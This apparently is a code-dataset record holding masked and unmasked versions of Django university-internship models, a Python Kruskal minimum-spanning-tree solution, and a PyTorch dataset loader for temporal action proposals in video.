"step-1": "<mask token>\n\n\nclass cursos(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-2": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-3": "<mask token>\n\n\nclass faculdades(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-4": "from django.db import models\n\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key=True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade',\n on_delete=models.CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key=True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models\n .CASCADE)\n\n def __str__(self):\n return self.nome\n\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key=True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models\n .CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest',\n on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n\n def __str__(self):\n return '%s' % self.codigo\n\n\n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'\n",
"step-5": "from django.db import models\n\nclass faculdades(models.Model):\n codigo = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n cidade = models.CharField(max_length=30)\n estado = models.CharField(max_length=20)\n pais = models.CharField(max_length=20)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'faculdades'\n verbose_name = 'Cad.Faculdade'\n\nclass cursos(models.Model):\n codigo = models.AutoField(primary_key = True)\n nome = models.CharField(max_length=50)\n departamento = models.CharField(max_length=30)\n faculdade = models.ForeignKey('faculdades', db_column='faculdade', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'cursos'\n verbose_name = 'Cad.Curso'\n\nclass profcoorest(models.Model):\n masp = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=50)\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'profcoorest'\n verbose_name = 'Cad.Profcoorest'\n\nclass alunos(models.Model):\n matricula = models.IntegerField(primary_key = True)\n nome = models.CharField(max_length=100)\n sexo = models.CharField(max_length=1)\n datanasc = models.DateField()\n periodo = models.IntegerField()\n curso = models.ForeignKey('cursos', db_column='curso', on_delete=models.CASCADE)\n \n def __str__(self):\n return self.nome\n\n class Meta:\n managed = False\n db_table = 'alunos'\n verbose_name = 'Cad.Aluno'\n\nclass estagio(models.Model):\n codigo = models.AutoField(primary_key = True)\n aluno = models.ForeignKey('alunos', db_column='aluno', on_delete=models.CASCADE)\n profest = models.ForeignKey('profcoorest', db_column='profest', on_delete=models.CASCADE)\n remunerado = models.CharField(max_length=1)\n valor = models.DecimalField(max_digits=6, decimal_places=2)\n empresa = models.CharField(max_length=30)\n cargahr = models.IntegerField()\n descr_est = models.CharField(max_length=256)\n resp_est = models.CharField(max_length=50)\n \n def __str__(self):\n return '%s' % (self.codigo)\n \n class Meta:\n managed = False\n db_table = 'estagio'\n verbose_name = 'Cad.Estagio'",
"step-ids": [
11,
13,
14,
16,
17
]
}
|
[
11,
13,
14,
16,
17
] |
import sys
V, E = map(int, sys.stdin.readline().split())
node = []
graphs = []
for i in range(V+1):
node.append(i)
for _ in range(E):
graphs.append((list(map(int, sys.stdin.readline().split()))))
graph = sorted(graphs, key=lambda x: x[2])
def get_parent(parent, x):
if parent[x] == x:
return x
parent[x] = get_parent(parent, parent[x])
return parent[x]
def union_parent(parent, a, b):
a = get_parent(parent, a)
b = get_parent(parent, b)
if a != b:
parent[b] = a
N = 0
distance = 0
idx = 0
while N < V-1:
A, B, dist = graph[idx]
if get_parent(node, A) == get_parent(node, B):
idx += 1
continue
union_parent(node, A, B)
distance += dist
N += 1
idx += 1
print(distance)
|
normal
|
{
"blob_id": "2e794e281c6f34858cd32725cdc454eb18c28892",
"index": 3415,
"step-1": "<mask token>\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\n<mask token>\n",
"step-2": "<mask token>\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\n<mask token>\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\n<mask token>\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-3": "<mask token>\nV, E = map(int, sys.stdin.readline().split())\nnode = []\ngraphs = []\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-4": "import sys\nV, E = map(int, sys.stdin.readline().split())\nnode = []\ngraphs = []\nfor i in range(V + 1):\n node.append(i)\nfor _ in range(E):\n graphs.append(list(map(int, sys.stdin.readline().split())))\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V - 1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\nprint(distance)\n",
"step-5": "import sys\n\nV, E = map(int, sys.stdin.readline().split())\n\nnode = []\ngraphs = []\nfor i in range(V+1):\n node.append(i)\n\nfor _ in range(E):\n graphs.append((list(map(int, sys.stdin.readline().split()))))\n\ngraph = sorted(graphs, key=lambda x: x[2])\n\n\ndef get_parent(parent, x):\n if parent[x] == x:\n return x\n parent[x] = get_parent(parent, parent[x])\n return parent[x]\n\n\ndef union_parent(parent, a, b):\n a = get_parent(parent, a)\n b = get_parent(parent, b)\n if a != b:\n parent[b] = a\n\n\nN = 0\ndistance = 0\nidx = 0\nwhile N < V-1:\n A, B, dist = graph[idx]\n if get_parent(node, A) == get_parent(node, B):\n idx += 1\n continue\n\n union_parent(node, A, B)\n distance += dist\n N += 1\n idx += 1\n\nprint(distance)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import pandas
import numpy
import json
import torch.utils.data as data
import os
import torch
def load_json(file):
with open(file) as json_file:
data = json.load(json_file)
return data
class VideoDataSet(data.Dataset):
def __init__(self,opt,subset="train"):
self.temporal_scale = opt["temporal_scale"] # 时域长度 归一化到100
self.temporal_gap = 1. / self.temporal_scale # 每个snippt时间占比
self.subset = subset # training validation or test
self.mode = opt["mode"] # 'train' or 'test'
self.feature_path = opt["feature_path"] # '特征存放位置'
self.boundary_ratio = opt["boundary_ratio"] # 0.1 人为扩充boundary的区域长度占总长度的比率
self.video_info_path = opt["video_info"] # 存在视频信息的csv
self.video_anno_path = opt["video_anno"] # 存放标记信息的csv
self._getDatasetDict()
self.check_csv()
def check_csv(self):
# 因为某些视频的特征可能不存在,或者遭到了损坏
for video in self.video_list:
if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
print("video :{} feature csv is not existed".format(video))
self.video_list.remove(video)
del self.video_dict[video]
# 删除已知的错误样本
del_videl_list = ['v_5HW6mjZZvtY']
for v in del_videl_list:
if v in self.video_dict:
print("del " + v +' video')
self.video_list.remove(v)
del self.video_dict[v]
print ("After check: csv \n %s subset video numbers: %d" %(self.subset,len(self.video_list)))
def _getDatasetDict(self):
anno_df = pd.read_csv(self.video_info_path)
anno_database= load_json(self.video_anno_path)
self.video_dict = {} # 存放一系列内容,包括gt
for i in range(len(anno_df)):
video_name=anno_df.video.values[i]
video_info=anno_database[video_name]
video_subset=anno_df.subset.values[i] # 读取该视频属于的子数据集 training validation or test
if self.subset == "full": #全部都要
self.video_dict[video_name] = video_info
if self.subset in video_subset:
self.video_dict[video_name] = video_info # 是需要的数据集样本添加到字典中
self.video_list = list(self.video_dict.keys()) # 含有哪些video
print ("Before check: csv \n %s subset video numbers: %d" %(self.subset,len(self.video_list)))
def __getitem__(self, index):
video_data,anchor_xmin,anchor_xmax = self._get_base_data(index)
if self.mode == "train":
match_score_action,match_score_start,match_score_end = self._get_train_label(index,anchor_xmin,anchor_xmax)
return video_data,match_score_action,match_score_start,match_score_end
else:
return index,video_data,anchor_xmin,anchor_xmax
def _get_base_data(self,index):
video_name=self.video_list[index]
anchor_xmin=[self.temporal_gap*i for i in range(self.temporal_scale)] # 0.00 d到 0.99
anchor_xmax=[self.temporal_gap*i for i in range(1,self.temporal_scale+1)] # 0.01到1.00
try:
video_df=pd.read_csv(self.feature_path+ "csv_mean_"+str(self.temporal_scale)+"/"+video_name+".csv") # 得到这个视频的特征
except:
print('Error in '+video_name+".csv")
video_data = video_df.values[:,:]
video_data = torch.Tensor(video_data) # 这个video的特征[100, 400]
video_data = torch.transpose(video_data,0,1) #[400, 100] 便于时域的一维卷积操作
video_data.float()
return video_data,anchor_xmin,anchor_xmax
def _get_train_label(self,index,anchor_xmin,anchor_xmax): # 相当于要生成3个概率序列的真值
video_name=self.video_list[index]
video_info=self.video_dict[video_name] # 包括duration_second duration_frame annotations and feature_frame 但是这个特征长度已经被归一化了
video_frame=video_info['duration_frame']
video_second=video_info['duration_second']
feature_frame=video_info['feature_frame']
corrected_second=float(feature_frame)/video_frame*video_second #相当于校准时间 因为采用的滑动窗口形式进行提取特征,两个frame会存在一些差异
video_labels=video_info['annotations']
gt_bbox = []
for j in range(len(video_labels)): #将时间归一化 0到1之间
tmp_info=video_labels[j]
tmp_start=max(min(1,tmp_info['segment'][0]/corrected_second),0)
tmp_end=max(min(1,tmp_info['segment'][1]/corrected_second),0)
gt_bbox.append([tmp_start,tmp_end])
gt_bbox=np.array(gt_bbox)
gt_xmins=gt_bbox[:,0]
gt_xmaxs=gt_bbox[:,1]
gt_lens=gt_xmaxs-gt_xmins
gt_len_small=np.maximum(self.temporal_gap,self.boundary_ratio*gt_lens) # starting region 和 ending region的长度
gt_start_bboxs=np.stack((gt_xmins-gt_len_small/2,gt_xmins+gt_len_small/2),axis=1) # starting region
gt_end_bboxs=np.stack((gt_xmaxs-gt_len_small/2,gt_xmaxs+gt_len_small/2),axis=1) # ending region
# anchors = np.stack((anchor_xmin, anchor_xmax), 1) # 代表每一个snippet的范围
match_score_action=[]
# 给每一个位置计算TEM的三个概率值,但是from 0 to 99 效率不高吧 这种方法生成会有大量的无效操作,特别是gt较少的时候,可以后期优化
for jdx in range(len(anchor_xmin)):
match_score_action.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_xmins,gt_xmaxs)))
match_score_start=[]
for jdx in range(len(anchor_xmin)):
match_score_start.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_start_bboxs[:,0],gt_start_bboxs[:,1])))
match_score_end=[]
for jdx in range(len(anchor_xmin)):
match_score_end.append(np.max(self._ioa_with_anchors(anchor_xmin[jdx],anchor_xmax[jdx],gt_end_bboxs[:,0],gt_end_bboxs[:,1])))
match_score_action = torch.Tensor(match_score_action)
match_score_start = torch.Tensor(match_score_start)
match_score_end = torch.Tensor(match_score_end)
return match_score_action,match_score_start,match_score_end #3个长度为100的概率序列
def _ioa_with_anchors(self,anchors_min,anchors_max,box_min,box_max):
len_anchors=anchors_max-anchors_min
int_xmin = np.maximum(anchors_min, box_min)
int_xmax = np.minimum(anchors_max, box_max)
inter_len = np.maximum(int_xmax - int_xmin, 0.)
scores = np.divide(inter_len, len_anchors)
return scores
def _ioa(self, anchors, gts):
len_anchors = anchors[:,1] - anchors[:,0]
int_min = np.maximum(anchors[:,0],gts[:,0])
int_max = np.minimum(anchors[:,1],gts[:,1])
np.maximum(np.expand_dims(np.arange(1, 5), 1), np.arange(3))
def __len__(self):
return len(self.video_list)
class ProposalDataSet(data.Dataset):
def __init__(self,opt,subset="train"):
self.subset=subset
self.mode = opt["mode"]
if self.mode == "train": # 测试与前推时的样本数量是不一样的
self.top_K = opt["pem_top_K"]
else:
self.top_K = opt["pem_top_K_inference"]
self.video_info_path = opt["video_info"]
self.video_anno_path = opt["video_anno"]
self.feature_path = opt["feature_path"] # '特征存放位置'
self.temporal_scale = opt["temporal_scale"] # 时域长度 归一化到100
self._getDatasetDict()
self.check_csv()
def check_csv(self):
# 因为某些视频的特征可能不存在,或者遭到了损坏
for video in self.video_list:
if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
print("video :{} feature csv is not existed".format(video))
self.video_list.remove(video)
del self.video_dict[video]
# 删除已知的错误样本
del_videl_list = ['v_5HW6mjZZvtY']
for v in del_videl_list:
if v in self.video_dict:
print("del " + v +' video')
self.video_list.remove(v)
del self.video_dict[v]
print ("After check: csv \n %s subset video numbers: %d" %(self.subset,len(self.video_list)))
def _getDatasetDict(self):
anno_df = pd.read_csv(self.video_info_path) #读取信息
anno_database= load_json(self.video_anno_path) # 读取相关真值信息
self.video_dict = {}
for i in range(len(anno_df)):
video_name=anno_df.video.values[i]
video_info=anno_database[video_name]
video_subset=anno_df.subset.values[i]
if self.subset == "full":
self.video_dict[video_name] = video_info
if self.subset in video_subset:
self.video_dict[video_name] = video_info
self.video_list = list(self.video_dict.keys())
print ("%s subset video numbers: %d" %(self.subset,len(self.video_list)))
def __len__(self):
return len(self.video_list)
def __getitem__(self, index):
video_name = self.video_list[index]
pdf=pandas.read_csv("./output/PGM_proposals/"+video_name+".csv") # 读取proposal
pdf=pdf[:self.top_K]
video_feature = numpy.load("./output/PGM_feature/" + video_name+".npy") # read BSP feature for proposals
video_feature = video_feature[:self.top_K,:]
#print len(video_feature),len(pdf)
video_feature = torch.Tensor(video_feature)
if self.mode == "train":
video_match_iou = torch.Tensor(pdf.match_iou.values[:]) # choose IOU as gt 已经在TEM inference阶段计算好
return video_feature,video_match_iou # [bs, 32] [bs]
else:
# 取得proposals的 starting location, ending location, starting score, ending score
video_xmin =pdf.xmin.values[:]
video_xmax =pdf.xmax.values[:]
video_xmin_score = pdf.xmin_score.values[:]
video_xmax_score = pdf.xmax_score.values[:]
return video_feature,video_xmin,video_xmax,video_xmin_score,video_xmax_score
def load_json(file):
with open(file) as json_file:
json_data = json.load(json_file)
return json_data
class BMN_VideoDataSet(data.Dataset):
def __init__(self, opt, subset="train"):
self.temporal_scale = opt["temporal_scale"] # 100
self.temporal_gap = 1. / self.temporal_scale
self.subset = subset
self.mode = opt["mode"]
self.feature_path = opt["feature_path"]
self.video_info_path = opt["video_info"]
self.video_anno_path = opt["video_anno"]
self._getDatasetDict()
self.check_csv()
self._get_match_map()
def check_csv(self):
# 因为某些视频的特征可能不存在,或者遭到了损坏
for video in self.video_list:
if not os.path.exists(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video + ".csv"):
print("video :{} feature csv is not existed".format(video))
self.video_list.remove(video)
del self.video_dict[video]
# 删除已知的错误样本
del_videl_list = ['v_5HW6mjZZvtY']
for v in del_videl_list:
if v in self.video_dict:
print("del " + v +' video')
self.video_list.remove(v)
del self.video_dict[v]
print ("After check: csv \n %s subset video numbers: %d" %(self.subset,len(self.video_list)))
def _getDatasetDict(self):
anno_df = pd.read_csv(self.video_info_path)
anno_database = load_json(self.video_anno_path)
self.video_dict = {}
for i in range(len(anno_df)):
video_name = anno_df.video.values[i]
video_info = anno_database[video_name]
video_subset = anno_df.subset.values[i]
if self.subset in video_subset:
self.video_dict[video_name] = video_info
self.video_list = list(self.video_dict.keys())
print("%s subset video numbers: %d" % (self.subset, len(self.video_list)))
def __getitem__(self, index):
video_data = self._load_file(index) # video feature [400, 100]
if self.mode == "train":
# [D, T] [100, 100] [T=100] [T=100]
match_score_start, match_score_end, confidence_score = self._get_train_label(index, self.anchor_xmin,
self.anchor_xmax)
return video_data,confidence_score, match_score_start, match_score_end
else:
return index, video_data
def _get_match_map(self):
match_map = []
for idx in range(self.temporal_scale):
tmp_match_window = []
xmin = self.temporal_gap * idx # start locaiton 归一化之后的
for jdx in range(1, self.temporal_scale + 1):
xmax = xmin + self.temporal_gap * jdx # ending location 加上duration
tmp_match_window.append([xmin, xmax])
match_map.append(tmp_match_window)
match_map = np.array(match_map) # 100x100x2 最后一个2代表BM map上面每一个代表的candidate proposals所代表的时域范围 [start, duration, 2]
match_map = np.transpose(match_map, [1, 0, 2]) # [0.00,0.01] [0.01,0.02] [0.02,0.03].....[0.99,0.100] [duration, start, 2]
match_map = np.reshape(match_map, [-1, 2]) # [0,2] [1,3] [2,4].....[99,101] # duration x start [100*100, 2]
self.match_map = match_map # duration is same in row, start is same in col
self.anchor_xmin = [self.temporal_gap * (i-0.5) for i in range(self.temporal_scale)] # 每一个 snippet 的 开始时间
self.anchor_xmax = [self.temporal_gap * (i+0.5) for i in range(1, self.temporal_scale + 1)] # 每一个 snippet的结束时刻
# 注意从产生特征的角度来看,上面的anchor min 和anchor max 应该和BSN一样,不减去0.5,
# 比如第一个特征的就是由0-16帧图片产生,最后一个特征就是-16到-1的图片产生,应该 不用减去那个0.5
# 之后可以通过实验验证一下是否影响精度 相反,我觉得上面的match map应该加上0,5 因为每个snippet的中央区域在中间 但是因为是离线处理,所以不应该纠结那么多
def _load_file(self, index):
video_name = self.video_list[index]
video_df = pd.read_csv(self.feature_path + "csv_mean_" + str(self.temporal_scale) + "/" + video_name + ".csv")
video_data = video_df.values[:, :]
video_data = torch.Tensor(video_data)
video_data = torch.transpose(video_data, 0, 1)
video_data.float()
return video_data
def _get_train_label(self, index, anchor_xmin, anchor_xmax):
video_name = self.video_list[index]
video_info = self.video_dict[video_name]
video_frame = video_info['duration_frame']
video_second = video_info['duration_second']
feature_frame = video_info['feature_frame']
corrected_second = float(feature_frame) / video_frame * video_second # there are some frames not used
video_labels = video_info['annotations'] # the measurement is second, not frame
##############################################################################################
# change the measurement from second to percentage
gt_bbox = []
gt_iou_map = []
for j in range(len(video_labels)): #对于每个Proposal
tmp_info = video_labels[j]
tmp_start = max(min(1, tmp_info['segment'][0] / corrected_second), 0) # 归一化时间
tmp_end = max(min(1, tmp_info['segment'][1] / corrected_second), 0)
gt_bbox.append([tmp_start, tmp_end])
tmp_gt_iou_map = iou_with_anchors( # 每一个候选的proposals计算IOU
self.match_map[:, 0], self.match_map[:, 1], tmp_start, tmp_end)
tmp_gt_iou_map = np.reshape(tmp_gt_iou_map,
[self.temporal_scale, self.temporal_scale]) # [100, 100] 相当于BM map的label
gt_iou_map.append(tmp_gt_iou_map)
gt_iou_map = np.array(gt_iou_map) # [num_gt, 100, 100]
gt_iou_map = np.max(gt_iou_map, axis=0) # 取最大的IOU作为gt [100, 100]
gt_iou_map = torch.Tensor(gt_iou_map)
##############################################################################################
####################################################################################################
# generate R_s and R_e # 构建增强后的start region和ending region
gt_bbox = np.array(gt_bbox)
gt_xmins = gt_bbox[:, 0]
gt_xmaxs = gt_bbox[:, 1]
gt_lens = gt_xmaxs - gt_xmins
gt_len_small = 3 * self.temporal_gap # np.maximum(self.temporal_gap, self.boundary_ratio * gt_lens) # 直接用绝对大小代表增强区域的大小
gt_start_bboxs = np.stack((gt_xmins - gt_len_small / 2, gt_xmins + gt_len_small / 2), axis=1)
gt_end_bboxs = np.stack((gt_xmaxs - gt_len_small / 2, gt_xmaxs + gt_len_small / 2), axis=1) # 产生增强之后的两个区域
#####################################################################################################
##########################################################################################################
# calculate the ioa for all timestamp # 计算两个概率序列的真值
match_score_start = []
for jdx in range(len(anchor_xmin)): # 针对每一个anchor都计算与gt之间的ioa作为真值
match_score_start.append(np.max(
ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_start_bboxs[:, 0], gt_start_bboxs[:, 1])))
match_score_end = []
for jdx in range(len(anchor_xmin)):
match_score_end.append(np.max(
ioa_with_anchors(anchor_xmin[jdx], anchor_xmax[jdx], gt_end_bboxs[:, 0], gt_end_bboxs[:, 1])))
match_score_start = torch.Tensor(match_score_start)
match_score_end = torch.Tensor(match_score_end)
############################################################################################################
return match_score_start, match_score_end, gt_iou_map # 三个真值 [100], [100], [100,100]
def __len__(self):
return len(self.video_list)
def ioa_with_anchors(anchors_min, anchors_max, box_min, box_max):
# calculate the overlap proportion between the anchor and all bbox for supervise signal,
# the length of the anchor is 0.01
len_anchors = anchors_max - anchors_min
int_xmin = np.maximum(anchors_min, box_min)
int_xmax = np.minimum(anchors_max, box_max)
inter_len = np.maximum(int_xmax - int_xmin, 0.)
scores = np.divide(inter_len, len_anchors)
return scores
def iou_with_anchors(anchors_min, anchors_max, box_min, box_max):
"""Compute jaccard score between a box and the anchors.
"""
len_anchors = anchors_max - anchors_min
int_xmin = np.maximum(anchors_min, box_min)
int_xmax = np.minimum(anchors_max, box_max)
inter_len = np.maximum(int_xmax - int_xmin, 0.)
union_len = len_anchors - inter_len + box_max - box_min
# print inter_len,union_len
jaccard = np.divide(inter_len, union_len)
return jaccard
if __name__ == '__main__':
import opts
opt = opts.parse_opt()
opt = vars(opt)
# test dataset for BMN network
train_loader = torch.utils.data.DataLoader(BMN_VideoDataSet(opt, subset="train"),
batch_size=opt["bmn_batch_size"], shuffle=True,
num_workers=8, pin_memory=True)
for a,b,c,d in train_loader:
print(a.shape,b.shape,c.shape,d.shape)
break
|
normal
|
{
"blob_id": "e5b5a0c8c0cbe4862243548b3661057240e9d8fd",
"index": 6077,
